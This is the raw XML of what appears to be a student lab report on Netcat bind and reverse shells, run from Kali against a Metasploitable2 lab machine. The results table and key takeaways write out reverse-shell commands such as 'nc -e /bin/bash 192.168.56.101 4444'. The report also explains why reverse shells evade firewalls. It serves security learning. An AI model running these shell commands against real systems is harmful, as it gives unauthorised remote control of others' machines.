        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2998"/>
        <w:gridCol w:w="7036"/>
      </w:tblGrid>
      <w:tr w:rsidR="00565784" w14:paraId="49F5D7D5" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="052DD29F" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>RESULT SUMMARY</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00565784" w14:paraId="46F48BB6" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="333333"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7765D773" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7040" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="19074526" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Observation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00565784" w14:paraId="41F564FF"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2EA094D8" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Listener command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7040" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="617AE022" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="262626"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>nc -lvnp 4444 (Kali)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00565784" w14:paraId="0E63C174"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7E307302" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Connect-back command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7040" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="23B914E8" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="262626"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>nc -e /bin/bash 192.168.56.101 4444 (Metasploitable2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00565784" w14:paraId="5C5D45CC"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24014952" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Connection reported</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7040" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6066A1E2" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="262626"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>connect to [192.168.56.101] from (UNKNOWN) [192.168.56.102] 49882</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00565784" w14:paraId="4A1109EE"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014B9621" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>whoami result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7040" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4BCB1C7F" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="262626"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>msfadmin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00565784" w14:paraId="0E782FCF" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0AB6D3F1" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>File created</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7040" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="22ED8E48" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="262626"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>names.txt, created with touch inside kali_Documents on the target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="33CECEE6" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00565784">
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>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20"/>
      </w:tblGrid>
      <w:tr w:rsidR="00565784" w14:paraId="71BED6B2" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="160" w:type="dxa"/>
              <w:left w:w="220" w:type="dxa"/>
              <w:bottom w:w="160" w:type="dxa"/>
              <w:right w:w="220" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1FE417F6" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>My Observation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C77FA02" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
              </w:rPr>
              <w:t>The reverse shell felt more realistic as an attack pattern: the target reaches out, so from the target's side it looks like ordinary outbound traffic rather than an open listening port waiting to be found. A firewall that blocks unsolicited inbound connections but allows outbound ones (a common default) would stop the bind shell in Section 1 but let this one through, which is exactly why reverse shells are the more commonly used technique in real engagements. Neither version here uses any encryption, so anyone capturing traffic on the network — which I could confirm later with tcpdump — would see every command and every reply in plain text.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="413F5ECE" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="6" w:color="333333"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Key Takeaways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3724CD4B" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The -e flag attaches a program to a Netcat connection, so its input and output travel over the network — this is what turns a plain pipe into a remote shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E48287" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Bind shell: the target listens (nc -l ... -e /bin/bash) and the attacker connects in. Simple, but it requires an open listening port on the target, which is easy to notice with a port scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E702512" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Reverse shell: the attacker listens (nc -l) and the target connects out (nc -e /bin/bash &lt;attacker-ip&gt; &lt;port&gt;). This blends in better with normal outbound traffic and is the more commonly used pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4B0DF0" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Once connected, either shell is fully interactive: whoami, ls -la, cd and touch all worked exactly as they would in a normal terminal session on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D628754" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="262626"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Both shells here were unencrypted plain text, so everything typed and returned would be visible to anyone capturing traffic on the network.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00565784">
      <w:headerReference w:type="default" r:id="rId9"/>
      <w:footerReference w:type="default" r:id="rId10"/>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8F200" w14:textId="77777777" w:rsidR="002B3DC4" w:rsidRDefault="002B3DC4">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6B9A7839" w14:textId="77777777" w:rsidR="002B3DC4" w:rsidRDefault="002B3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A39D" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="4D4D4D"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="4D4D4D"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="4D4D4D"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="4D4D4D"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="002D764E">
      <w:rPr>
        <w:noProof/>
        <w:color w:val="4D4D4D"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="4D4D4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F7409" w14:textId="77777777" w:rsidR="002B3DC4" w:rsidRDefault="002B3DC4">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="453CF2D1" w14:textId="77777777" w:rsidR="002B3DC4" w:rsidRDefault="002B3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6D87" w14:textId="77777777" w:rsidR="00565784" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="4" w:space="4" w:color="BFBFBF"/>
      </w:pBdr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="4D4D4D"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>Netcat Practical 3 — Bind &amp; Reverse Shell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96BED"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8B7A4E40"/>
    <w:lvl w:ilvl="0" w:tplc="467A3CFA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="D6F4C89E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="EBDE6968">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="4F2A5BEA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="9C08844A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="76CAB58C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="6DA02F0A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="DF2E8274">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="23E44842">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="935599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784"/>
    <w:rsid w:val="002B3DC4"/>
    <w:rsid w:val="002D764E"/>
    <w:rsid w:val="0037459B"/>
    <w:rsid w:val="00565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AFDF7"/>
  <w15:docId w15:val="{55BBF1F0-4C57-4977-BBC6-64405935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ADMINIISTRATOR</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-09-28T02:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-28T02:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>